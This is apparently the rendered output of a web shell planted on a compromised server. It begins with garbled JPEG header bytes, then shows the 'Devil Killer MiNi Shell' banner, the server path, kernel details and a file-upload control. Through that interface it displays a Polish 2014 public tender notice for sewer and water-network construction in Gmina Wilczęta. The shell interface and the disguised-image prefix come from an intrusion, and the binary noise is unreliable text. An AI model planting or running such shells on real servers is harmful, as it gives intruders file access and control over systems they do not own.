JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140114/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140114/15286-N-2014.html

<p class="kh_header"><b>Wilczęta: Budowa sieci kanalizacji sanitarnej w Gminie Wilczęta II etap wraz z modernizacją sieci 	wodociągowej w m. Słobity</b><br>
<b>Numer ogłoszenia: 15286 - 2014; data zamieszczenia: 14.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny w Wilczętach , Wilczęta 84, 14-405 Wilczęta, woj. warmińsko-mazurskie, tel. 0-55 248 75 06, faks 0-55 249 65 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugwilczeta.bip.doc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej w Gminie Wilczęta II etap wraz z modernizacją sieci 	wodociągowej w m. Słobity.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie robót budowlanych związanych z Budową sieci kanalizacji sanitarnej w Gminie Wilczęta II etap wraz z modernizacją sieci wodociągowej w m. Słobity.
Przedmiot zamówienia opisuje dokumentacja projektowa, opracowana na zlecenie Zamawiającego.
Zakres rzeczowy przedmiotu zamówienia obejmuje kompleksowe wybudowanie kanalizacji sanitarnej i sieci wodociągowej z przyłączami dla  miejscowości położonych na terenie Gminy Wilczęta z włączeniami do istniejącej kanalizacji tranzytowej i wodociągowej.
Zakres rzeczowy w ujęciu ilościowym, w poszczególnych miejscowościach obejmuje:
a) Sieć kan. sanitarnej Wilczęta - Karwiny i Dębień-Słobity
kanalizacja grawitacyjna  PVC O 200 - 2479,0m, O250 - 1183,51m, O400 - 38,0m, 
					O 160 - 43,0 m
- 	kolektory tłoczne PEHD O 160 - 6130,0m, O110 - 3137,5m, PE O90 - 632,0m, 
    		O 63 - 225,5m
	- 	przyłącza - szt.109 - L = 1945,0m
- przepompownie pośrednie (przepompownia prefabrykowana z wyposażeniem i instalacjami, ogrodzeniem, nawierzchnią) - 7 kpl.
b) sieci wodociągowe z przyłączami w m. Słobity
             - sieci wodociągowe  PVC O 110- 2790,0m, O90 - 537,0m ,
             - przyłącza - szt. 77 - L = 1336.0m PE O40 - 873,5m, PE O50 - 438.5m, PE O63 -24.0m
	
1.Roboty, czynności i usługi uzupełniające

Oprócz robót podstawowych, dla kompleksowej realizacji przedmiotu zamówienia Wykonawca będzie zobowiązany do:
a) obsługi geodezyjnej inwestycji oraz wykonania dokumentacji geodezyjnej powykonawczej z jej zarejestrowaniem i wniesieniem do zasobów właściwego  ośrodka dokumentacji geodezyjnej i kartograficznej,
b) wykonania robót przygotowawczych, porządkowych, zagospodarowania placu budowy, utrzymania zaplecza budowy, zaopatrzenia budowy w wodę i energię elektryczną oraz wykonania dróg tymczasowych,
c) wykonania projektu bezpieczeństwa i ochrony zdrowia i zabezpieczeń w nim przewidzianych,
d) przeprowadzania pomiarów, prób i badań wymaganych w dokumentacji projektowej, specyfikacji wykonania i odbioru robót oraz przepisach, w tym również prób rozruchowych przepompowni,
e) spełnienia wymagań uzgodnień wydanych przez firmy branżowe będące gestorami sieci istniejącego uzbrojenia terenu, a w szczególności zawiadamianie o rozpoczęciu robót, nadzór i kontrola w miejscach kolizji oraz odbiory techniczne zabezpieczeń przez przedstawicieli tych firm,
f)  uzgadniania z użytkownikiem włączeń do istniejącej sieci kanalizacji sanitarnej oraz przeprowadzanie odbiorów technicznych tych włączeń,
g) wykonania projektu organizacji ruchu i uzyskania pozwolenia na prowadzenie robót w obrębie pasa dróg powiatowych i wojewódzkiej,
h)  zawiadamiania właścicieli działek na trasie projektowanej kanalizacji o wejściu z robotami na ich teren i uzgadniania z nimi terminu rozpoczęcia robót,
i) odtworzenia przypowierzchniowej warstwy ziemi urodzajnej, nawierzchni utwardzonych na dojazdach i ciągach pieszych oraz nawierzchni drogowych wraz z podbudowami w obrębie wykopów i na fragmentach uszkodzonych w trakcie prowadzenia robót,
j) wykonania badań stopnia zagęszczenia zasypek, podsypek i podbudów z materiałów sypkich,
k) wykonania elementów zabezpieczających ciągłość ruchu pieszych i pojazdów na drogach i dojazdach do poszczególnych posesji jak np. kładki dla pieszych i drogi tymczasowe,
l) zabezpieczenia budowy i wykonanych robót,
ł) naprawy uszkodzonych ogrodzeń i elementów zagospodarowania terenu oraz uszkodzonego uzbrojenia podziemnego,
m) rozruchu przepompowni po podłączeniu zasilania;
n) opracowania projektów technologii wykonania robót (zabezpieczeń wykopów, odwodnienia wykopów, przekroczeń przeszkód terenowych i montażu przepompowni), jeżeli będzie to dla Wykonawcy konieczne do wykonania tych robót,
o) likwidacji elementów i urządzeń zagospodarowania budowy oraz uporządkowania terenu,
p) przygotowywanie odrębnej dokumentacji przygotowania i realizacją robót związanych z odwodnieniem wykopów,
r) badania metodą inspekcji telewizyjnej ciągów kanalizacji grawitacyjnej, rozdzielczej,
s) przygotowania uporządkowanej i zebranej w jedną dokumentacji odbiorowej inwestycji (2 egz. do przekazania Zamawiającemu) zawierającej dokumentację powykonawczą projektową (z naniesionymi zamianami) i geodezyjną, dokumenty potwierdzające parametry i właściwości wybudowanych materiałów i urządzeń, protokóły z badań, pomiarów i sprawdzeń, dziennik budowy, instrukcje obsługi zainstalowanych urządzeń i DTR przepompowni, końcowe rozliczenie inwestycji,
t) uzyskania niezbędnych pozwoleń na zrzut wody gruntowej usuwanej z odwadnianych wykopów.
u) wykonania zaplecza budowy wraz z pomieszczeniem dla inspektorów nadzoru oraz składem materiałów i maszyn w ustalonym z Zamawiającym miejscu przed rozpoczęciem robót. 
	Koszt wymienionych powyżej zobowiązań Wykonawca winien uwzględnić w cenie ofertowej przyjmując ten koszt jako narzut kosztorysowy.

2.Wymagania ogólne związane z realizacją zamówienia

A. Do wykonania inwestycji muszą być używane materiały i urządzenia fabrycznie nowe dopuszczone do stosowania w budownictwie, spełniające warunki określone w Ustawie o wyrobach budowlanych z dnia 16.04.2004r. (Dz. U. Nr 92, poz 881 z późniejszymi zmianami) oraz przepisach wykonawczych do tej ustawy.

B. W przypadkach wskazania w dokumentacji projektowej konkretnych producentów lub dostawców Zamawiający wyraża zgodę na zastosowanie materiałów lub urządzeń co najmniej równoważnych pod względem parametrów technicznych i jakościowych. 

C. Wykonanie włączeń do istniejącej sieci kanalizacji sanitarnej nie mogą powodować zakłóceń i utrudnień w jej funkcjonowaniu.

D. Przy realizacji robót Wykonawca musi przestrzegać przepisów dotyczących ochrony środowiska, a w szczególności:
- segregować i właściwie utylizować odpady
- w sąsiedztwie zabudowy mieszkaniowej nie prowadzić prac w porze nocnej, w godz. 22-6.
- ograniczyć w terenie zabudowanym używanie ciężkich maszyn o napędzie spalinowym
- chronić bryły korzeniowe drzew i krzewów w bezpośrednim sąsiedztwie wykopów
- stosować technologie ograniczające pylenie przy składowaniu i wykorzystywaniu materiałów sypkich
- usuwać zanieczyszczenia mechaniczne z wody odprowadzanej z wykopów.

E. Roboty będą prowadzone przy zachowaniu ciągłości ruchu i zagwarantowaniu dojazdu do poszczególnych posesji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 50 000 zł (słownie: pięćdziesiąt tysięcy złotych) wniesionym w terminie 4.02.2014 roku do godz. 12 00
Wadium może być wniesione w :
1) pieniądzu do dnia 4.02.2014 do godz. 1200 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych, 
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z  dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r., Nr 42, poz. 275).
Wadium wnoszone w pieniądzu należy wpłacić na rachunek Zakładu Komunalnego w Wilczętach 
		Nr 82830300060030030227410007

Wadium wnoszone w innej formie niż pieniężna należy załączyć w ofercie.
Wykonawca, którego oferta nie będzie zabezpieczona wadium zostanie przez Zamawiającego wykluczona z postępowania, a jego oferta będzie odrzucona.

Wadium będzie zwracane w okolicznościach, na warunkach i w terminach określonych w art.46 ust. 1,2,3, 4 i 4a ustawy Prawo Zamówień publicznych.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
	1) odmówił podpisania umowy na warunkach określonych w ofercie.
	2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
	3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia wynikające z art. 22 i 24 ustawy Prawo zamówień publicznych.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców  składających wspólną ofertę.
Aktualny  odpis  z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców  składających wspólną ofertę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia wynikające z art. 22 i 24 ustawy Prawo zamówień publicznych.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców  składających wspólną ofertę.
Wykaz wykonanych robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty zostały wykonane w sposób należyty oraz wskazujący , czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
W wykazie należy wymienić inwestycje potwierdzające spełnianie przez Wykonawcę lub Wykonawców składających wspólną ofertę warunku określonego tj. co najmniej: 
a)dwóch robót budowlanych obejmujących kompleksowe wykonanie systemów kanalizacji sanitarnej z pompowniami tłocznymi o wartości brutto nie mniejszej niż 2 500 000 zł każda,
albo:
b)dwóch robót budowlanych obejmujących kompleksowe wykonanie systemów kanalizacji sanitarnej z pompowniami tłocznymi i siecią wodociągową o wartości brutto nie mniejszej niż 2 500 000 zł każda,
albo:
c)jednej roboty budowlanej obejmującej kompleksowe wykonanie systemów kanalizacji sanitarnej z pompowniami tłocznymi i jednej roboty budowlanej obejmującej  kompleksowe wykonanie systemów kanalizacji sanitarnej z pompowniami tłocznymi i siecią wodociągową o wartości brutto nie mniejszej niż 2 500 000 zł każda.
Wykazu robót wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 
Przy ocenie spełnienia warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) dane stanowiące o spełnieniu tych warunków będą traktowane łącznie wg dokumentów składanych przez Wykonawców składających ofertę.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych  metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie wykwalifikowaną kadrą własną lub udostępnioną na podstawie pisemnego zobowiązania innych podmiotów, niezbędną do kierowania robotami, będącymi przedmiotem zamówienia. Osoby, wyznaczone do kierowania robotami w poszczególnych branżach, muszą posiadać wymagane uprawnienia i doświadczenie w kierowaniu robotami w swojej branży przez okres nie krótszy niż 5 lat. 
Zamawiający informuje, że jedna osoba może pełnić funkcje kierownika robót kilku branż, o ile spełnia warunki dla kierownika robót danej branży.
Oświadczenia wynikające z art. 22 i 24 ustawy Prawo zamówień publicznych.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców  składających wspólną ofertę.
Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Na potwierdzenie spełniania warunku  w wykazie osób należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi Wykonawca lub wykonawcy składający wspólną ofertę dysponują lub będzie dysponować na podstawie pisemnego zobowiązania innych podmiotów oraz podać informację o przeciętnym zatrudnieniu na podstawie umowy o pracę w  2013 r. wraz z informacją o podstawie do dysponowania tymi osobami i oświadczeniem o posiadaniu przez te osoby wymaganych uprawnień budowlanych.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają jeden taki dokument.
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, w celu oceny, czy wykonawca będzie  dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, należy przedłożyć sprawozdania finansowe lub ich części, informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej oraz opłaconą polisę  oraz dokumenty dotyczące zakresu dostępnych wykonawcy zasobów innego podmiotu i sposobu ich wykorzystania przez wykonawcę przy wykonywaniu zamówienia.
Przy ocenie spełnienia warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) dane stanowiące o spełnieniu tych warunków będą traktowane łącznie wg dokumentów składanych przez Wykonawców składających ofertę.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych  metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie wykwalifikowaną kadrą własną lub udostępnioną na podstawie pisemnego zobowiązania innych podmiotów, niezbędną do kierowania robotami, będącymi przedmiotem zamówienia. Osoby, wyznaczone do kierowania robotami w poszczególnych branżach, muszą posiadać wymagane uprawnienia i doświadczenie w kierowaniu robotami w swojej branży przez okres nie krótszy niż 5 lat. 
Zamawiający informuje, że jedna osoba może pełnić funkcje kierownika robót kilku branż, o ile spełnia warunki dla kierownika robót danej branży.
Oświadczenia wynikające z art. 22 i 24 ustawy Prawo zamówień publicznych.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców  składających wspólną ofertę.
Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Na potwierdzenie spełniania warunku  w wykazie osób należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi Wykonawca lub wykonawcy składający wspólną ofertę dysponują lub będzie dysponować na podstawie pisemnego zobowiązania innych podmiotów oraz podać informację o przeciętnym zatrudnieniu na podstawie umowy o pracę w  2013 r. wraz z informacją o podstawie do dysponowania tymi osobami i oświadczeniem o posiadaniu przez te osoby wymaganych uprawnień budowlanych.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają jeden taki dokument.
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, w celu oceny, czy wykonawca będzie  dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, należy przedłożyć sprawozdania finansowe lub ich części, informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej oraz opłaconą polisę  oraz dokumenty dotyczące zakresu dostępnych wykonawcy zasobów innego podmiotu i sposobu ich wykorzystania przez wykonawcę przy wykonywaniu zamówienia.
Przy ocenie spełnienia warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) dane stanowiące o spełnieniu tych warunków będą traktowane łącznie wg dokumentów składanych przez Wykonawców składających ofertę.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych  metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uzyskali średnioroczny przychód ze sprzedaży w okresie ostatnich trzech lat obrotowych, a jeżeli okres działalności jest krótszy to w tym okresie w wysokości co najmniej 3 000 000 zł.
Oświadczenia wynikające z art. 22 i 24 ustawy Prawo zamówień publicznych.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców  składających wspólną ofertę.
Dokumenty określające przychody Wykonawcy - sprawozdania finansowego albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami  o rachunkowości, również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzani sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy- za ten okres.
Posiadają środki finansowe w wysokości, co najmniej 500 000zł lub zdolność kredytową w wysokości co najmniej 500 000zł.
Dokument określający aktualną sytuację finansową Wykonawcy - informacja z banku, w którym Wykonawca posiada rachunek wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert określający wysokość posiadanych środków finansowych lub wysokość zdolności kredytowej.
Opłaconą polisę, a w przypadku jej braku, inny dokumentu potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia
Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, w celu oceny, czy wykonawca będzie  dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, należy przedłożyć sprawozdania finansowe lub ich części, informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej oraz opłaconą polisę  oraz dokumenty dotyczące zakresu dostępnych wykonawcy zasobów innego podmiotu i sposobu ich wykorzystania przez wykonawcę przy wykonywaniu zamówienia.
Przy ocenie spełnienia warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) dane stanowiące o spełnieniu tych warunków będą traktowane łącznie wg dokumentów składanych przez Wykonawców składających ofertę.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych  metodą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

